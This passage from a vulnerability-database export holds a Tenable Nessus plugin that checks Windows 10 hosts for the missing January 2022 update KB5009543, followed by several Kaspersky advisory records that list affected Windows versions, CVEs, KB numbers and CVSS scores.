script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009543\");\n script_xref(name:\"MSFT\", value:\"MS22-5009543\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009543: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (January 2022) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009543.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009543.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009543');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009543]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:58:15", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005090](<http://support.microsoft.com/kb/5005090>) \n[5005089](<http://support.microsoft.com/kb/5005089>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005095](<http://support.microsoft.com/kb/5005095>) \n[5005088](<http://support.microsoft.com/kb/5005088>) \n[5011525](<http://support.microsoft.com/kb/5011525>) \n[5011534](<http://support.microsoft.com/kb/5011534>) \n[5011552](<http://support.microsoft.com/kb/5011552>) \n[5011529](<http://support.microsoft.com/kb/5011529>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12250 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-03-09T00:00:00", "id": "KLA12250", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12250/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:57:59", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nRemote Desktop client for Windows Desktop \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36948](<https://nvd.nist.gov/vuln/detail/CVE-2021-36948>) \n[CVE-2021-26424](<https://nvd.nist.gov/vuln/detail/CVE-2021-26424>) \n[CVE-2021-26433](<https://nvd.nist.gov/vuln/detail/CVE-2021-26433>) \n[CVE-2021-36945](<https://nvd.nist.gov/vuln/detail/CVE-2021-36945>) \n[CVE-2021-26432](<https://nvd.nist.gov/vuln/detail/CVE-2021-26432>) \n[CVE-2021-36926](<https://nvd.nist.gov/vuln/detail/CVE-2021-36926>) \n[CVE-2021-36942](<https://nvd.nist.gov/vuln/detail/CVE-2021-36942>) \n[CVE-2021-36947](<https://nvd.nist.gov/vuln/detail/CVE-2021-36947>) \n[CVE-2021-34487](<https://nvd.nist.gov/vuln/detail/CVE-2021-34487>) \n[CVE-2021-34530](<https://nvd.nist.gov/vuln/detail/CVE-2021-34530>) \n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) \n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) \n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": "KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:27:33", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21925](<https://nvd.nist.gov/vuln/detail/CVE-2022-21925>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21925](<https://vulners.com/cve/CVE-2022-21925>)5.0Critical \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)5.0Critical \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)5.0Critical \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)5.0Critical \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Critical \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)5.0Critical \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)5.0Critical \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)5.0Critical \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)5.0Critical \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.0Critical 